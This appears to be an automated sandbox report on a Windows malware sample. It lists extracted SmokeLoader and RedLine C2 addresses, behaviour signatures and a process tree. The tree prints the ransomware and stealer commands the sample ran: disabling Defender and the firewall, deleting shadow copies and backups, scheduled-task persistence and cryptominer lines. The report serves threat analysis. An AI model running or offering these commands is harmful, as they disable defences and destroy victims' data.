Analysis

  • max time kernel
    99s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-en-20210916
  • submitted
    20/09/2021, 13:11

General

  • Target

    28ea220f0c8f906c66e1ab5657ca0260.exe

  • Size

    269KB

  • MD5

    28ea220f0c8f906c66e1ab5657ca0260

  • SHA1

    04d158591858f17abd9295f481c26ae7ef771e37

  • SHA256

    71bbaf19229855f0bfdebbe93d12b5f5fac6c0b542b5ca3b5a00d4b088ccdadc

  • SHA512

    aba54593ad2344b0c40e8942f1b4099c639eb443ec2a31c98813243bcc7f03fb192a879be7748d1681db889673e5e1e5d257d8256112359363daa0eacd945cb0

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://venerynnet1.top/

http://kevonahira2.top/

http://vegangelist3.top/

http://kingriffaele4.top/

http://arakeishant5.top/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

installEXE

C2

146.70.35.170:30905

Extracted

Family

redline

Botnet

installbv

C2

80.85.137.89:17954

Extracted

Family

redline

Botnet

Moneymaker

C2

185.244.217.166:56316

Signatures

  • MedusaLocker

    Ransomware with several variants first seen in September 2019.

  • MedusaLocker Payload 1 IoCs
  • Process spawned unexpected child process 8 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 9 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • XMRig Miner Payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Deletes System State backups 3 TTPs 2 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Downloads MZ/PE file
  • Executes dropped EXE 18 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 22 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 4 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 41 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 15 IoCs
  • Drops file in Windows directory 6 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Interacts with shadow copies 2 TTPs 13 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 42 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 11 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\28ea220f0c8f906c66e1ab5657ca0260.exe
    "C:\Users\Admin\AppData\Local\Temp\28ea220f0c8f906c66e1ab5657ca0260.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1632
    • C:\Users\Admin\AppData\Local\Temp\28ea220f0c8f906c66e1ab5657ca0260.exe
      "C:\Users\Admin\AppData\Local\Temp\28ea220f0c8f906c66e1ab5657ca0260.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:840
  • C:\Users\Admin\AppData\Local\Temp\3310.exe
    C:\Users\Admin\AppData\Local\Temp\3310.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1068
    • C:\Users\Admin\AppData\Local\Temp\3310.exe
      C:\Users\Admin\AppData\Local\Temp\3310.exe
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:536
  • C:\Users\Admin\AppData\Local\Temp\3A04.exe
    C:\Users\Admin\AppData\Local\Temp\3A04.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:296
    • C:\Users\Admin\AppData\Local\Temp\3A04.exe
      C:\Users\Admin\AppData\Local\Temp\3A04.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1696
  • C:\Users\Admin\AppData\Local\Temp\46C1.exe
    C:\Users\Admin\AppData\Local\Temp\46C1.exe
    1⤵
    • Executes dropped EXE
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of AdjustPrivilegeToken
    PID:1780
  • C:\Users\Admin\AppData\Local\Temp\A3C0.exe
    C:\Users\Admin\AppData\Local\Temp\A3C0.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:1656
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\eeswysxz\
      2⤵
        PID:1972
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\cjvirefz.exe" C:\Windows\SysWOW64\eeswysxz\
        2⤵
          PID:1808
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create eeswysxz binPath= "C:\Windows\SysWOW64\eeswysxz\cjvirefz.exe /d\"C:\Users\Admin\AppData\Local\Temp\A3C0.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:288
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description eeswysxz "wifi internet conection"
            2⤵
              PID:1584
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start eeswysxz
              2⤵
                PID:1860
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:1036
              • C:\Users\Admin\AppData\Local\Temp\B4D1.exe
                C:\Users\Admin\AppData\Local\Temp\B4D1.exe
                1⤵
                • Executes dropped EXE
                • Checks BIOS information in registry
                • Checks whether UAC is enabled
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of AdjustPrivilegeToken
                PID:1548
              • C:\Windows\SysWOW64\eeswysxz\cjvirefz.exe
                C:\Windows\SysWOW64\eeswysxz\cjvirefz.exe /d"C:\Users\Admin\AppData\Local\Temp\A3C0.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:1536
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  PID:1288
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:788
              • C:\Users\Admin\AppData\Local\Temp\C7D5.exe
                C:\Users\Admin\AppData\Local\Temp\C7D5.exe
                1⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:1808
                • C:\Windows\SysWOW64\cmd.exe
                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\C7D5.exe"
                  2⤵
                    PID:2248
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout /T 10 /NOBREAK
                      3⤵
                      • Delays execution with timeout.exe
                      PID:2292
                • C:\Users\Admin\AppData\Local\Temp\DB08.exe
                  C:\Users\Admin\AppData\Local\Temp\DB08.exe
                  1⤵
                  • Executes dropped EXE
                  PID:1848
                • C:\Users\Admin\AppData\Local\Temp\F8F5.exe
                  C:\Users\Admin\AppData\Local\Temp\F8F5.exe
                  1⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Drops desktop.ini file(s)
                  • Enumerates connected drives
                  • Drops file in Program Files directory
                  • System policy modification
                  PID:1148
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=c: /on=c: /maxsize=401MB
                    2⤵
                    • Interacts with shadow copies
                    PID:1352
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=c: /on=c: /maxsize=unbounded
                    2⤵
                    • Interacts with shadow copies
                    PID:2372
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=d: /on=d: /maxsize=401MB
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:2424
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=d: /on=d: /maxsize=unbounded
                    2⤵
                    • Interacts with shadow copies
                    PID:2488
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=e: /on=e: /maxsize=401MB
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:2532
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=e: /on=e: /maxsize=unbounded
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:2576
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=f: /on=f: /maxsize=401MB
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:2620
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=f: /on=f: /maxsize=unbounded
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:2668
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=g: /on=g: /maxsize=401MB
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:2712
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=g: /on=g: /maxsize=unbounded
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:2756
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=h: /on=h: /maxsize=401MB
                    2⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:2800
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin.exe Resize ShadowStorage /for=h: /on=h: /maxsize=unbounded
                    2⤵
                    • Interacts with shadow copies
                    PID:2844
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin.exe Delete Shadows /All /Quiet
                    2⤵
                    • Interacts with shadow copies
                    PID:2888
                  • C:\Windows\system32\bcdedit.exe
                    bcdedit.exe /set {default} recoveryenabled No
                    2⤵
                    • Modifies boot configuration data using bcdedit
                    PID:2932
                  • C:\Windows\system32\bcdedit.exe
                    bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                    2⤵
                    • Modifies boot configuration data using bcdedit
                    PID:2956
                  • C:\Windows\system32\wbadmin.exe
                    wbadmin DELETE SYSTEMSTATEBACKUP
                    2⤵
                    • Deletes System State backups
                    • Drops file in Windows directory
                    PID:2980
                  • C:\Windows\system32\wbadmin.exe
                    wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
                    2⤵
                    • Deletes System State backups
                    • Drops file in Windows directory
                    PID:3036
                  • C:\Windows\System32\Wbem\wmic.exe
                    wmic.exe SHADOWCOPY /nointeractive
                    2⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1660
                • C:\Windows\system32\vssvc.exe
                  C:\Windows\system32\vssvc.exe
                  1⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2132
                • C:\Users\Admin\AppData\Local\Temp\1FB.exe
                  C:\Users\Admin\AppData\Local\Temp\1FB.exe
                  1⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2140
                  • C:\ProgramData\ZZZZZ.exe
                    "C:\ProgramData\ZZZZZ.exe"
                    2⤵
                    • Executes dropped EXE
                    PID:1496
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c start C:\Users\Admin\AppData\Local\Temp\DriverMaster.exe
                      3⤵
                      • Loads dropped DLL
                      PID:2256
                      • C:\Users\Admin\AppData\Local\Temp\DriverMaster.exe
                        C:\Users\Admin\AppData\Local\Temp\DriverMaster.exe
                        4⤵
                        • Executes dropped EXE
                        PID:2116
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\Admin\AppData\Local\Temp\EngineDriverMaster.exe"' & exit
                          5⤵
                          • Enumerates connected drives
                          PID:2844
                          • C:\Windows\system32\schtasks.exe
                            schtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\Admin\AppData\Local\Temp\EngineDriverMaster.exe"'
                            6⤵
                            • Creates scheduled task(s)
                            PID:2908
                        • C:\Users\Admin\AppData\Local\Temp\EngineDriverMaster.exe
                          "C:\Users\Admin\AppData\Local\Temp\EngineDriverMaster.exe"
                          5⤵
                            PID:2976
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\Admin\AppData\Local\Temp\EngineDriverMaster.exe"' & exit
                              6⤵
                                PID:1040
                                • C:\Windows\system32\schtasks.exe
                                  schtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\Admin\AppData\Local\Temp\EngineDriverMaster.exe"'
                                  7⤵
                                  • Creates scheduled task(s)
                                  PID:2064
                              • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
                                "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
                                6⤵
                                  PID:1188
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c start C:\Users\Admin\AppData\Roaming\DriverRealtekHDmaster.exe
                            3⤵
                            • Loads dropped DLL
                            PID:308
                        • C:\Users\Admin\AppData\Local\Temp\1FB.exe
                          "C:\Users\Admin\AppData\Local\Temp\1FB.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1352
                      • C:\Users\Admin\AppData\Local\Temp\94C.exe
                        C:\Users\Admin\AppData\Local\Temp\94C.exe
                        1⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Suspicious use of SetThreadContext
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2304
                        • C:\Users\Admin\AppData\Local\Temp\94C.exe
                          "C:\Users\Admin\AppData\Local\Temp\94C.exe"
                          2⤵
                          • Executes dropped EXE
                          PID:2520
                          • C:\Users\Admin\AppData\Local\Temp\chlen.exe
                            "C:\Users\Admin\AppData\Local\Temp\chlen.exe"
                            3⤵
                              PID:2516
                              • C:\Users\Admin\AppData\Local\Temp\chlen.exe
                                "C:\Users\Admin\AppData\Local\Temp\chlen.exe"
                                4⤵
                                  PID:2912
                              • C:\Users\Admin\AppData\Local\Temp\Zena.exe
                                "C:\Users\Admin\AppData\Local\Temp\Zena.exe"
                                3⤵
                                  PID:2580
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(exit)
                                    4⤵
                                      PID:3044
                                      • C:\ProgramData\UpSys.exe
                                        "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
                                        5⤵
                                          PID:692
                                          • C:\ProgramData\UpSys.exe
                                            "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
                                            6⤵
                                              PID:2772
                                              • C:\ProgramData\UpSys.exe
                                                "C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
                                                7⤵
                                                  PID:2676
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                    8⤵
                                                      PID:2752
                                              • C:\Windows\system32\netsh.exe
                                                "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
                                                5⤵
                                                  PID:1912
                                              • C:\ProgramData\Systemd\Moneylogs1.exe
                                                -epool eu1.ethermine.org:4444 -ewal 0xd988388A10BEe45505917886eB7d2d1ff6ccA80a -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth
                                                4⤵
                                                  PID:1904
                                                • C:\ProgramData\Systemd\Moneylogs1.exe
                                                  -epool eu1.ethermine.org:4444 -ewal 0xd988388A10BEe45505917886eB7d2d1ff6ccA80a -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth
                                                  4⤵
                                                    PID:2296
                                                  • C:\ProgramData\Systemd\Moneylogs1.exe
                                                    -epool eu1.ethermine.org:4444 -ewal 0xd988388A10BEe45505917886eB7d2d1ff6ccA80a -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth
                                                    4⤵
                                                      PID:2212
                                                    • C:\ProgramData\Systemd\Moneylogs1.exe
                                                      -epool eu1.ethermine.org:4444 -ewal 0xd988388A10BEe45505917886eB7d2d1ff6ccA80a -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth
                                                      4⤵
                                                        PID:2252
                                                      • C:\ProgramData\Systemd\Moneylogs1.exe
                                                        -epool eu1.ethermine.org:4444 -ewal 0xd988388A10BEe45505917886eB7d2d1ff6ccA80a -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth
                                                        4⤵
                                                          PID:1400
                                                        • C:\ProgramData\Systemd\Moneylogs1.exe
                                                          -epool eu1.ethermine.org:4444 -ewal 0xd988388A10BEe45505917886eB7d2d1ff6ccA80a -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth
                                                          4⤵
                                                            PID:2560
                                                          • C:\ProgramData\Systemd\Moneylogs1.exe
                                                            -epool eu1.ethermine.org:4444 -ewal 0xd988388A10BEe45505917886eB7d2d1ff6ccA80a -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth
                                                            4⤵
                                                              PID:1628
                                                            • C:\ProgramData\Systemd\Moneylogs1.exe
                                                              -epool eu1.ethermine.org:4444 -ewal 0xd988388A10BEe45505917886eB7d2d1ff6ccA80a -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth
                                                              4⤵
                                                                PID:964
                                                              • C:\ProgramData\Systemd\Moneylogs1.exe
                                                                -epool eu1.ethermine.org:4444 -ewal 0xd988388A10BEe45505917886eB7d2d1ff6ccA80a -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth
                                                                4⤵
                                                                  PID:1524
                                                                • C:\ProgramData\Systemd\Moneylogs1.exe
                                                                  -epool eu1.ethermine.org:4444 -ewal 0xd988388A10BEe45505917886eB7d2d1ff6ccA80a -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth
                                                                  4⤵
                                                                    PID:2128
                                                                  • C:\ProgramData\Systemd\Moneylogs1.exe
                                                                    -epool eu1.ethermine.org:4444 -ewal 0xd988388A10BEe45505917886eB7d2d1ff6ccA80a -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth
                                                                    4⤵
                                                                      PID:2624
                                                                    • C:\ProgramData\Systemd\Moneylogs1.exe
                                                                      -epool eu1.ethermine.org:4444 -ewal 0xd988388A10BEe45505917886eB7d2d1ff6ccA80a -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth
                                                                      4⤵
                                                                        PID:856
                                                                      • C:\ProgramData\Systemd\Moneylogs1.exe
                                                                        -epool eu1.ethermine.org:4444 -ewal 0xd988388A10BEe45505917886eB7d2d1ff6ccA80a -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth
                                                                        4⤵
                                                                          PID:2940
                                                                        • C:\ProgramData\Systemd\Moneylogs1.exe
                                                                          -epool eu1.ethermine.org:4444 -ewal 0xd988388A10BEe45505917886eB7d2d1ff6ccA80a -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth
                                                                          4⤵
                                                                            PID:236
                                                                          • C:\ProgramData\Systemd\Moneylogs1.exe
                                                                            -epool eu1.ethermine.org:4444 -ewal 0xd988388A10BEe45505917886eB7d2d1ff6ccA80a -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth
                                                                            4⤵
                                                                              PID:2900
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 1676
                                                                          2⤵
                                                                          • Loads dropped DLL
                                                                          • Program crash
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:2608
                                                                      • C:\Users\Admin\AppData\Roaming\DriverRealtekHDmaster.exe
                                                                        C:\Users\Admin\AppData\Roaming\DriverRealtekHDmaster.exe
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        PID:2152
                                                                        • C:\ProgramData\Mozilla\updates\308046B0AF4A39CB\conhost.exe
                                                                          "C:\ProgramData\Mozilla\updates\308046B0AF4A39CB\conhost.exe"
                                                                          2⤵
                                                                            PID:2384
                                                                        • C:\Windows\system32\conhost.exe
                                                                          \??\C:\Windows\system32\conhost.exe "-302909105-1731375503-8489526855536028311792770416183970813913936553002090750258"
                                                                          1⤵
                                                                          • Enumerates connected drives
                                                                          PID:2488
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\WmiPrvSE.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • Process spawned unexpected child process
                                                                          • Creates scheduled task(s)
                                                                          PID:1932
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\wininit.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • Process spawned unexpected child process
                                                                          • Creates scheduled task(s)
                                                                          PID:2900
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\ProgramData\Mozilla\updates\308046B0AF4A39CB\conhost.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • Process spawned unexpected child process
                                                                          • Creates scheduled task(s)
                                                                          PID:1812
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "Zena" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\46C1\Zena.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • Process spawned unexpected child process
                                                                          • Creates scheduled task(s)
                                                                          PID:2168
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "VSSVC" /sc ONLOGON /tr "'C:\Windows\System32\write\VSSVC.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • Process spawned unexpected child process
                                                                          • Creates scheduled task(s)
                                                                          PID:2300
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\ProgramData\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\dwm.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • Process spawned unexpected child process
                                                                          • Creates scheduled task(s)
                                                                          PID:2100
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\System32\mfc100chs\winlogon.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • Process spawned unexpected child process
                                                                          • Creates scheduled task(s)
                                                                          PID:2348
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\System32\ddodiag\conhost.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • Process spawned unexpected child process
                                                                          • Creates scheduled task(s)
                                                                          PID:2696
                                                                        • C:\Windows\system32\makecab.exe
                                                                          "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20210920131336.log C:\Windows\Logs\CBS\CbsPersist_20210920131336.cab
                                                                          1⤵
                                                                            PID:1596
                                                                          • C:\Windows\system32\wermgr.exe
                                                                            "C:\Windows\system32\wermgr.exe" "-outproc" "2692" "512"
                                                                            1⤵
                                                                              PID:2516

                                                                            Network

                                                                            MITRE ATT&CK Enterprise v6

                                                                            Replay Monitor

                                                                            Loading Replay Monitor...

                                                                            Downloads

                                                                            • memory/296-69-0x0000000000810000-0x0000000000811000-memory.dmp

                                                                              Filesize

                                                                              4KB

                                                                            • memory/296-71-0x00000000049D0000-0x00000000049D1000-memory.dmp

                                                                              Filesize

                                                                              4KB

                                                                            • memory/788-134-0x0000000000080000-0x0000000000171000-memory.dmp

                                                                              Filesize

                                                                              964KB

                                                                            • memory/840-55-0x00000000755A1000-0x00000000755A3000-memory.dmp

                                                                              Filesize

                                                                              8KB

                                                                            • memory/840-53-0x0000000000400000-0x0000000000408000-memory.dmp

                                                                              Filesize

                                                                              32KB

                                                                            • memory/1148-140-0x000000013F790000-0x0000000140008000-memory.dmp

                                                                              Filesize

                                                                              8.5MB

                                                                            • memory/1188-244-0x000000013F850000-0x000000013F851000-memory.dmp

                                                                              Filesize

                                                                              4KB

                                                                            • memory/1188-248-0x0000000002450000-0x0000000002452000-memory.dmp

                                                                              Filesize

                                                                              8KB

                                                                            • memory/1192-57-0x00000000029F0000-0x0000000002A05000-memory.dmp

                                                                              Filesize

                                                                              84KB

                                                                            • memory/1192-86-0x0000000003F50000-0x0000000003F65000-memory.dmp

                                                                              Filesize

                                                                              84KB

                                                                            • memory/1288-109-0x0000000000080000-0x0000000000095000-memory.dmp

                                                                              Filesize

                                                                              84KB

                                                                            • memory/1352-199-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                              Filesize

                                                                              136KB

                                                                            • memory/1352-192-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                              Filesize

                                                                              136KB

                                                                            • memory/1352-201-0x00000000004C0000-0x00000000004C1000-memory.dmp

                                                                              Filesize

                                                                              4KB

                                                                            • memory/1536-113-0x0000000000400000-0x0000000000455000-memory.dmp

                                                                              Filesize

                                                                              340KB

                                                                            • memory/1548-107-0x00000000003F0000-0x00000000003F1000-memory.dmp

                                                                              Filesize

                                                                              4KB

                                                                            • memory/1548-104-0x0000000000920000-0x0000000000921000-memory.dmp

                                                                              Filesize

                                                                              4KB

